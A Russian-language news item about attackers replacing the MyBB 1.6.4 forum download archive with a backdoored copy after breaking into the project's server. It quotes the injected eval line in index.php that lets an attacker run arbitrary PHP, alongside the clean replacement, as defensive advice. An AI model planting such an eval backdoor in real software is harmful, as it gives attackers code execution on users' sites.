В поставке открытого форума MyBB обнаружен вредоносный код

В начале октября разработчики открытого форума MyBB опубликовали уведомление о наличии критической уязвимости в последней версии 1.6.4, выпущенной три месяца назад. Сегодня опубликованы подробности, указывающие на то, что уязвимость, позволяющая выполнить произвольный код PHP, была внесена злоумышленниками путем подмены за архива с форумом на сервере.

По словам разработчиков злоумышленники проникли в систему через неизвестную уязвимость в движке сайта, разработанном своими силами, но основанном на использовании сторонних открытых фреймворков. Разработчики считают, что проблема безопасности присутствует не в коде их CMS, который не распространяется публично, а в используемых внешних фреймворках. Подробности совершения взлома и время подмены архива не известны, поэтому разработчики рекомендуют срочно установить обновление для всех пользователей MyBB 1.6.4, загрузивший архив до 6 октября. Пользователям рекомендуется проверить файл index.php на наличие вредоносного кода index.php и удалить директорию "install/".

Уязвимы системы в файле index.php который содержится строка:

   eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);  

для блокирования вредоносного кода, данную строку следует заменить на:

   eval("\$loginform = \"".$templates->get("index_loginform")."\";"); 

С целью предотвращения подобных инцидентов в будущем, разработчики MyBB намерены начать распространение контрольных сумм для проверки целостности изначально опубликованных архивов. Контрольные суммы планируется распространять через сторонний сервер, чтобы исключить ситуацию, при которой злоумышленники могут подменить файлы с контрольными суммами. Второй вариант, который рассматривают разработчики MyBB - использование сетей доставки контента для организации загрузки релизов.

Источник:
http://www.opennet.ru/opennews/art.shtml?num=32128

<= Назад
Комментарии
]]> ipv6 ready Kiev LUGLinux4MeНостальгияЛичный сайт skeletora ]]>